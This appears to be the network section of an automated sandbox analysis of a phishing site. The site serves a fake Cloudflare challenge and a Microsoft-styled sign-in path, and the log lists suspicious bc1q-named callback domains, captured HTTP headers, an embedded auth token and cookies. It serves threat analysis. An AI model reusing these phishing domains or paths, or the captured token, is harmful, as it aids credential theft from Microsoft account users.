Source: global traffic	HTTP traffic detected: GET /ajax/libs/jquery/3.6.0/jquery.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://timesofvartha.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: bc1qlpk73pgj3dz02nq8d9kpdxk.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ajax/libs/jquery/3.6.0/jquery.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /api/v3/auth HTTP/1.1Host: bc1qcr8muz00d2v7uqg5ggulrmm.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ests/2.1/content/cdnbundles/converged.v2.login.min_ziytf8dzt9eg1s6-ohhleg2.css HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://timesofvartha.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://timesofvartha.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://timesofvartha.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://timesofvartha.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://timesofvartha.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ests/2.1/content/cdnbundles/converged.v2.login.min_8owwt4u-33ps0wawi7tmow2.css HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Purpose: prefetchSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://timesofvartha.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ab HTTP/1.1Host: evoke-windowsservices-tas.msedge.netCache-Control: no-store, no-cacheX-PHOTOS-CALLERID: 9NMPJ99VJBWVX-EVOKE-RING: X-WINNEXT-RING: PublicX-WINNEXT-TELEMETRYLEVEL: BasicX-WINNEXT-OSVERSION: 10.0.19045.0X-WINNEXT-APPVERSION: 1.23082.131.0X-WINNEXT-PLATFORM: DesktopX-WINNEXT-CANTAILOR: FalseX-MSEDGE-CLIENTID: {c1afbad7-f7da-40f2-92f9-8846a91d69bd}X-WINNEXT-PUBDEVICEID: dbfen2nYS7HW6ON4OdOknKxxv2CCI5LJBTojzDztjwI=If-None-Match: 2056388360_-1434155563Accept-Encoding: gzip, deflate, br
Source: global traffic	HTTP traffic detected: GET /client/config?cc=CH&setlang=en-CH HTTP/1.1X-Search-CortanaAvailableCapabilities: NoneX-Search-SafeSearch: ModerateAccept-Encoding: gzip, deflateX-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}X-UserAgeClass: UnknownX-BM-Market: CHX-BM-DateFormat: dd/MM/yyyyX-Device-OSSKU: 48X-BM-DTZ: -300X-DeviceID: 01000A41090080B6X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66EX-Search-TimeZone: Bias=300; StandardBias=0; TimeZoneKeyName=Eastern Standard TimeX-BM-Theme: 000000;0078d7X-Search-RPSToken: t%3DEwDoAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAATKroDVehIwhR1af/NJXyEM/gWDmFHEyD/jvuxhb%2BEp%2BvftiDzLladduscq70ZpGhopdhEZ8qqmoHfIbPOSm0ugw3lhj3wJ9chhQzLUzuVkc/Fsc2Fy3cEeW6nFt1DjKEUSbAuArYcH8K2VpTtXi2iJT6WF5QLWupR1oI4/nrOgYjw%2B9EN2UiNbSRpRi%2BlbNvKOnMP/AM%2B7wbBEXXZQLov3CC4Z6plGqpD7kQ/JHTc5EilGf3jFWO9ofEF2EPhUhqWfv0vrT1fCOfdh9h%2BnJMHjCmEDgPxB8uuh7BhVOFIOqYB5jYNhlUhOn5cy9jVnPEnvlpoOXPtxV84wBnGKRN6cQZgAAEKEhzTaRKODLtvfk2V6x70awAfoXS%2B/EnknHIyjanr7q%2BqrhDuk1eZ9nmn4HYONYzsNp75mJcyWN8CSnrDfyY9Bf3/5G6g/2y/PoEhM3Mg6PrSSlp6b4xSGekoRRKMyg0mxmfFf6K9/sllXbk0OR%2BKJhIO75x/dN0VV8RJK49YbrzDdJgHVIMRVQerFapfmGjFlFhK3E2EDXlEHMhQg1RYAhYLVKCgyt%2BlKfghtuKQSAIooXLBtvLi4LlebYYU%2B36jXpwsyXlwwkt1kRcfXmHdbCO6XcIejtQXK5hc%2BSYoSMblBpUpTShzH%2BEJXK8TqRTWQLYCdwaWftz20paj9xV/53ph4ErasRw3SW3570tH8t532O/rga5AQC1t69EmmngayDOJDGqI2WO8wmCsTE9UBxM6yAZtppKFIye/AyxXV9BTrIcfIWGQcB2wbj1wDU6T2SoNuXaWtos7dhf5M6H7kPNMy20sk0MqwiVeTRckXXNudmkZrpoD/Gk0U0tmhkBZskAw7f37X/BH%2BO1usxb2rHrYIdTNvDyH1p9MnfuNKBlnnOZdkkQRSkVigT4%2BHGUtmSZzwY0OLBh9LdRj7kdV14l9oB%26p%3DX-Agent-DeviceId: 01000A41090080B6X-BM-CBT: 1731948986User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045X-Device-isOptin: falseAccept-language: en-GB, en, en-USX-Device-Touch: falseX-Device-ClientSession: 67B87F79F7DB4D5D925739CF3A7A9AADX-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIHost: www.bing.comConnection: Keep-AliveCookie: SRCHUID=V=2&GUID=C4EAB6C130004333A34B5668AE4E4D10&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=en; MUID=4590362BB5CF472B95BBEDB3112D4B7B; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
Source: global traffic	HTTP traffic detected: GET /auth-signin-apibridge_481736uyg7y73hdui21/ HTTP/1.1Host: timesofvartha.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://timesofvartha.com/cloudflare-challenge/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-Modified-Since: Thu, 14 Nov 2024 13:43:20 GMT
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: bc1qlpk73pgj3dz02nq8d9kpdxk.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /api/v3/auth HTTP/1.1Host: bc1qv5p8dwc98n3judrczkmpkjz.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /conf/v2/asgw/fpconfig.min.json?monitorId=asgw HTTP/1.1Origin: https://www.bing.comReferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept: /Accept-Language: en-CHAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: fp.msedge.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /apc/trans.gif?0fc259c7de35075dbd9af6fd5d2875fc HTTP/1.1Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept: image/png,image/svg+xml,image/;q=0.8,/*;q=0.5Accept-Language: en-CHAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: wac-ring-fallback.msedge.netConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /apc/trans.gif?46f04eb983746b06c882a75823505167 HTTP/1.1Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitAccept: image/png,image/svg+xml,image/;q=0.8,/*;q=0.5Accept-Language: en-CHAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045Host: wac-ring-fallback.msedge.netConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: r.neurotags.net
Source: global traffic	DNS traffic detected: DNS query: sepedatua.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: timesofvartha.com
Source: global traffic	DNS traffic detected: DNS query: challenges.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: bc1qlpk73pgj3dz02nq8d9kpdxk.org
Source: global traffic	DNS traffic detected: DNS query: bc1qcr8muz00d2v7uqg5ggulrmm.com
Source: global traffic	DNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: aadcdn.msftauth.net
Source: global traffic	DNS traffic detected: DNS query: bc1qv5p8dwc98n3judrczkmpkjz.com
Source: global traffic	DNS traffic detected: DNS query: passwordreset.microsoftonline.com
Source: global traffic	DNS traffic detected: DNS query: ajax.aspnetcdn.com

Source: unknown

HTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 3592Host: login.live.com

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Nov 2024 16:55:50 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 22:06:31 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Nov 2024 16:55:53 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: ZNmd9tj5k8Rbt3a67IwVYjty2/ijv/tc7OQ=$E9u5z8yzrOSODwFKServer: cloudflareCF-RAY: 8e497d9fcdc4485f-DFWalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Nov 2024 16:55:57 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: sQdPlVolUZWPsIUQkYK9hw0iSOpZytk4aj4=$dGb2SmUqG5RJlwkrServer: cloudflareCF-RAY: 8e497db89c316c52-DFWalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Nov 2024 16:56:00 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Tue, 15 Mar 2022 22:06:31 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/html
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Nov 2024 16:56:00 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: KSYgPJKDba2NVR+cQCb4Li4Z+h92amjZTgc=$KTl6df4IUzZfuPs5Server: cloudflareCF-RAY: 8e497dcdb8c6e905-DFWalt-svc: h3=":443"; ma=86400

Source: chromecache_285.13.dr	String found in binary or memory: http://cdn.jsinit.directfwd.com/sk-jspark_init.php
Source: 57C8EDB95DF3F0AD4EE2DC2B8CFD4157.0.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
Source: chromecache_280.13.dr	String found in binary or memory: https://timesofvartha.com/auth-signin-apibridge_481736uyg7y73hdui21/#
Source: chromecache_283.13.dr	String found in binary or memory: https://timesofvartha.com/cloudflare-challenge/#

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49691
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 49680 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49677 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 49676 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49691 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49854 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
